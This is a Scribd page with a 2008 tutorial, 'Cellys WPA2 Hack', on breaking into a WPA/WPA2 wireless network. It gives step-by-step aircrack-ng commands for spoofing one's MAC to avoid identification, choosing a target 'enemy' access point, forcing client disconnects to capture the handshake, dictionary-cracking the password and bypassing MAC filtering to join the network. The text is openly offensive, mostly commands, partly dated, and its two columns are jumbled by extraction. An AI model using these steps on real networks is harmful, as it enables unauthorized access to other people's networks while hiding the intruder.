0% found this document useful (0 votes)
84 views1 page

Cellys WPA2 Hack en

This document provides instructions for hacking a WPA2/WPA protected wireless network using a brute force attack on the network password. It outlines the steps to identify the target wireless device and access point, put the device in monitor mode to capture network traffic, use airodump-ng to find an access point with connected clients, use aireplay-ng to force a client reconnect and capture the handshake, and then use aircrack-ng to crack the password by comparing the captured handshake to words in a dictionary file. Once the password is cracked, it explains how to connect to the hacked access point by spoofing a client's MAC address and setting the cracked password.

Uploaded by

M S
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
84 views1 page

Cellys WPA2 Hack en

This document provides instructions for hacking a WPA2/WPA protected wireless network using a brute force attack on the network password. It outlines the steps to identify the target wireless device and access point, put the device in monitor mode to capture network traffic, use airodump-ng to find an access point with connected clients, use aireplay-ng to force a client reconnect and capture the handshake, and then use aircrack-ng to crack the password by comparing the captured handshake to words in a dictionary file. Once the password is cracked, it explains how to connect to the hacked access point by spoofing a client's MAC address and setting the cracked password.

Uploaded by

M S
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

WPA2/WPA Hack MAC filtered or not 5) Choose your enemy (SHELL 1)

Basics: Please remember the MAC address of the AP you want to


Software: BackTrack Remote Exploit V3 hack. Remember also the channel number from the AP you
Download: http://www.remote-exploit.org want to hack.
Chipset: ATHEROS (Cisco Aironet 802.11 a/b/g / NEC Now we only want to collect the packages on that channel
WarpStar WL54AG, Netgear WG311T) and we like to store that traffic in a CAP-file.
(DONT USE „--ivs“ Option!!)
Constellation: airodump-ng –w FILE –c CH --bssid APMAC IFC
- Boot from CD or HD with BT V3
- 64 MB free writeable Space 6) Waiting for a Handshake ! (SHELL 2)
- 2 Shells (under Xwindows it’s easier (startx)) Ok .. now we can wait for a Handshake. (You can see it in
the ariodump-ng window SHELL 1). The “enemy” don’t feel
If XWindows doesn’t work, configure it wirh “xconf” or anything about. But this can take a long time. You have to
„xorgconfig --textmode“ wait for a client-reconnect from which you will get the
handshake. But we can provoke a reconnect form a client.
Shortcuts: How can we provoke a reconnect? easy… we tell to the AP
- BT = BackTrack „Hello I am the client , and I want to disconnect.” The real
- MAC = MAC Address Client think „Shiiit I am disconnected.. I must reconnect
- AP = Accesspoint immediately!“ And we get the handshake we need and we
- CL = Client store it in SHELL1
- IFC = Interface (here ath0 placeholder) You can see it in the first line of SHELL1.
- FILE = Log file 2 store the packets So, if you want provoke a reconnect, type more then one
- CH = Channel times the fallowing command. (wait 5-20s between)
- DIC = Dictionary File (.dic or .txt) aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC

Foreword: 7) Crack the key! (SHELL 1)


This Hack is only working with the Brute Force method. Ok … we got the handshake. Let’s crack it! We compare the
My Core2Duo 3GHz hacks 420 Keys / Sec. stored handshake in the .cap file with the dictionary file.
It doesn’t matter WPA or WPA2. For hacking it is the aircrack-ng -0 –x2 -w DIC FILE.cap
same. ONLY WPA2 encrypted as TKIP works. AES is
incompatible! 8) Connect to the hacked AP (SHELL2)
With a MAC filtered AP you have to set a trusted MAC
General Conditions: address from a client on your own card.
- Accesspoint with good Signal ifconfig IFC down hw ether CL_MAC (maybe reset IFC first)
- one Client, who is connected to the AP.
- A Dictionary File and then connect to the AP:

Hack it ! For Mouse Lovers:


wlassistant
1) Wireless Device identification
We want to know how our device is named in the System. For Shell Lovers:
Type „iwconfig“. With Atheros Chipsets the devices calls iwconfig IFC essid AP_NAME_SSID mode Managed key
always athX. s:KEY_ASCII

2) Fake that MAC! (optional) ifconfig IFC up


First, we fake our own MAC address. So nobody can iwpriv IFC authmode 2 (to connect, LED flahing)
identify us any more. dhcpcd IFC (to get a IP Adress)
ifconfig IFC hw ether 00:11:22:33:44:55

3) Turn on Monitor Mode


To get all the packages we put our device in the
„Promiscuous Mode“
First we kill the monitor mode on the ath0 device and
create a new monitor device over the wifi0 device. After
we created the monitor device, we can use the ath0.
airmon-ng stop ath0 (delete the monitor mode) 2008 by Celly
airmon-ng start wifi0 (start monitor mode auf ath0)

4) What is online ? (SHELL 1)


Search some AP’s with already connected Clients.
(you can see it in the bottom half of the screen, calls
Stations and Clients)
airodump-ng –w FILE IFC
CTRL – C

You might also like